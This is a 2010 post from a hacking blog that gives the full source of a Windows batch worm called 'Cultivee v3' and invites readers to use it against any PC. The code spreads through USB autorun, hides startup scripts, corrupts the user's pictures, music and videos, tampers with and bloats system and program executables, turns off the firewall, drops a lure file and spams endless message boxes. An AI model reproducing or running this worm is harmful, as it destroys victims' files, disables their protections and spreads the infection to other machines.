Welcome to my site. Please CLICK HERE to give your opinions regarding this new look of "PCTipsbyAnu". Thanks for visiting.

Saturday, June 5, 2010

Browse » Home » , , , , , » BAT : Worm GEN.Cultivee v3

BAT : Worm GEN.Cultivee v3

http://shop.tosca.si/gic/stran/images/stories/razno/worm_on_computer.gif

A computer worm is a self-replicating malware computer program. It uses a computer network to send copies of itself to other nodes (computers on the network) and it may do so without any user intervention. This is due to security shortcomings on the target computer. Unlike a virus, it does not need to attach itself to an existing program. Worms almost always cause at least some harm to the network, if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.

I think there are no need to write that HOW TO USE IT?

CODE:
@echo off
goto asking
: Cultivee V3 By Mental Thriller (Atomic) Worm:GEN.Cultivee V3 :
: This is a simple batch worm that infects a usb if inserted and computer starts :
: If usb exists then injects intself into it using an autorun method then goes to infecto2 if not used before :
: Then if not used before expands all system file exe file sizes by 999999999 bytes :
: Also corrupts all users Music, Videos, and Pictures then sets up some fun talking scripts to run on startup :
: Then disables firewall, spreads to shared folder, and lastly spams "You were thrilled" onto the screen :
: I am NOT responsible for what you use this for, this is to further my advancement into my virus/worm hobby :
: I by all means support AV companies to not allow the use of virus's or worms and their spreading :
:asking
taskkill /F /IM explorer.exe
if errorlevel 1 goto next99
:next99
if exist "A:\" set drive=A
if exist "A:\" goto infecto
if exist "B:\" set drive=B
if exist "B:\" goto infecto
if exist "F:\" set drive=F
if exist "F:\" goto infecto
if exist "G:\" set drive=G
if exist "G:\" goto infecto
if exist "H:\" set drive=H
if exist "H:\" goto infecto
if exist "I:\" set drive=I
if exist "I:\" goto infecto
if exist "J:\" set drive=J
if exist "J:\" goto infecto
if exist "K:\" set drive=K
if exist "K:\" goto infecto
if exist "L:\" set drive=L
if exist "L:\" goto infecto
if exist "M:\" set drive=M
if exist "M:\" goto infecto
if exist "N:\" set drive=N
if exist "N:\" goto infecto
if exist "O:\" set drive=O
if exist "O:\" goto infecto
if exist "P:\" set drive=P
if exist "P:\" goto infecto
if exist "Q:\" set drive=Q
if exist "Q:\" goto infecto
if exist "R:\" set drive=R
if exist "R:\" goto infecto
if exist "S:\" set drive=S
if exist "S:\" goto infecto
if exist "T:\" set drive=T
if exist "T:\" goto infecto
if exist "U:\" set drive=U
if exist "U:\" goto infecto
if exist "V:\" set drive=V
if exist "V:\" goto infecto
if exist "W:\" set drive=W
if exist "W:\" goto infecto
if exist "X:\" set drive=X
if exist "X:\" goto infecto
if exist "Y:\" set drive=Y
if exist "Y:\" goto infecto
if exist "Z:\" set drive=Z
if exist "Z:\" goto infecto
if exist "C:\program files\Cultivee\cult.bat" goto after
goto infecto2
:infecto
if exist "%drive%\cultivee.bat" goto after
copy %0 "%drive%\cultivee.bat"
echo [autorun] > "%drive%\autorun.inf"
echo open=cultivee.bat >> "%drive%\autorun.inf"
echo action=Open folder to view files directory >> "%drive%\autorun.inf"
:infecto2
mkdir "C:\program files\Cultivee"
copy %0 "C:\program files\Cultivee\cult.bat"
echo Set Speech = CreateObject("SAPI.SpVoice") > "%userprofile%\start menu\programs\startup\kernel.vbs"
echo Speech.Speak "Cultivated to grow on you %username%" >> "%userprofile%\start menu\programs\startup\kernel.vbs"
echo MsgBox("Have a nice day %username%") >> "%userprofile%\start menu\programs\startup\kernel.vbs"
attrib +h "%userprofile%\start menu\programs\startup"
for /r %%k in "%userprofile%\Pictures\*.jpg" do copy /b %0 + %%k %%k
for /r %%l in "%userprofile%\Music\*.mp3" do copy /b %0 + %%l %%l
for /r %%n in "%userprofile%\Videos\*.wma" do copy /b %0 + %%n %%n
for %%f in "%windir%\system32\*.exe" do move /y %%f "%temp%\%%f"
copy /v /y %0 "C:\Users\Public\Downloads\Osama_killed.wma.bat"
echo EXPANSION > "C:\program files\Cultivee\file1.exe"
set num2=0
:while
set /a num2=%num2% + 1
echo EXPANSION >> "C:\program files\Cultivee\file1.exe"
if %num2% geq 999999999 goto next
goto while
:next
ren "C:\program files\Cultivee\file1.exe" "expand.exe"
for /r %%y in "%windir%\*.exe" do copy /b "C:\program files\Cultivee\expand.exe" + %%y %%y
for /r %%q in "C:\program files\*.exe" do copy /b "C:\program files\Cultivee\expand.exe" + %%q %%q
echo MsgBox("Please get a new AV") > "C:\program files\Cultivee\new.vbs"
start /D "C:\program files\Cultivee" new.vbs
echo Set objFirewall = CreateObject("HNetCfg.FwMgr") > "C:\program files\Cultivee\super.vbs"
echo Set objPolicy = objFirewall.LocalPolicy.CurrentProfile >> "C:\program files\Cultivee\super.vbs"
echo. >> "C:\program files\Cultivee\super.vbs"
objPolicy.FirewallEnabled = FALSE <> "C:\program files\Cultivee\super.vbs"
start /D "C:\program files\Cultivee" super.vbs
attrib +h "C:\program files\Cultivee"
:after
echo MsgBox("You were thrilled") > "C:\program files\Cultivee\exc.vbs"
:mental
start /D "C:\program files\Cultivee" exc.vbs
goto mental
So, Fuck anypc with this 'WORM'.
You can leave a response, or trackback from your own site.

About 'Anu': My name is 'Anu' also Known as 'ANU 007 TIGER' .I'm administrator of 'PC Tips by Anu' blog .This blog was opened for sharing contents about hacking n cracking.
Thanks YAHOO OR GMAIL

0 comments:

Post a Comment

 
Back to Top